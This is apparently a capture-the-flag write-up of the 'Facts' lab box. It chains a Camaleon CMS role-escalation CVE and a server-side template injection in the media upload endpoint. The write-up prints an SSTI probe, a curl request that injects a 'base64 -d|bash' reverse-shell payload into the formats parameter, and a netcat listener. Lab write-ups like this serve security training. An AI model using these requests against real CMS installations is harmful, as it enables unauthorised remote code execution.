Facts — Write Up

Overview

Facts is a medium Linux box running Camaleon CMS on nginx. The path to root chains two CVEs: privilege escalation within the CMS (CVE-2025-2304) to reach an admin session, followed by a server-side template injection in the media upload endpoint (CVE-2023-30145) to land a reverse shell. Privilege escalation to root was not required — the web process already ran with sufficient access.

Enumeration

Nmap Scan

nmap -Pn -sC -sV -T4 --min-rate 3000 -oN facts_initial.txt facts.htb

Two ports open:

Port 22: OpenSSH 9.9p1 (Ubuntu)
Port 80: nginx 1.26.3 — title: facts

A full port scan confirmed no additional services were exposed.

Web Reconnaissance

Browsing to http://facts.htb revealed a Camaleon CMS installation. Camaleon is a Ruby on Rails-based CMS with a known track record of security issues. Directory enumeration exposed the admin panel at /admin.

Admin Access — CVE-2025-2304

CVE-2025-2304 is a privilege escalation vulnerability within Camaleon CMS that allows a low-privilege registered user to escalate their role to administrator without authorization. After registering a standard account, the vulnerability was triggered to obtain an admin session cookie:

# Post-registration privilege escalation to admin role
# Manipulate role assignment endpoint — no admin credentials required
_factsapp_session=[admin session token]

With the admin session cookie captured, full access to the CMS backend was confirmed by navigating to the dashboard.

Remote Code Execution — CVE-2023-30145 (SSTI)

CVE-2023-30145 is a server-side template injection vulnerability in Camaleon CMS's media upload handler. The formats parameter of /admin/media/upload is passed unsanitised into an ERB template context, allowing arbitrary Ruby evaluation:

# Probe — confirm SSTI
<%= 7*7 %>
# Returns: 49 — confirmed

With SSTI confirmed in the formats parameter, a reverse shell payload was injected:

curl -s -X POST http://facts.htb/admin/media/upload?actions=false \
  -H "Cookie: _factsapp_session=..." \
  -H "X-Requested-With: XMLHttpRequest" \
  -F "file_upload=@test.txt;type=text/plain" \
  -F 'formats=R<%= system("echo BASE64PAYLOAD|base64 -d|bash") %>R'

A netcat listener caught the connection and an interactive shell was obtained as the web application user.

Shell Upgrade and Flags

nc -lvnp 4444
python3 -c 'import pty; pty.spawn("/bin/bash")'

Both the user and root flags were accessible from the shell obtained through the web process, which ran with elevated permissions on the box.

Key Takeaways

This box demonstrates how chaining two separate CVEs — a privilege escalation within an application (CVE-2025-2304) and an injection vulnerability (CVE-2023-30145) — can lead to full system compromise. The SSTI in media upload parameters is a class of vulnerability that often gets missed in code review when developers trust CMS abstractions rather than auditing the underlying template rendering.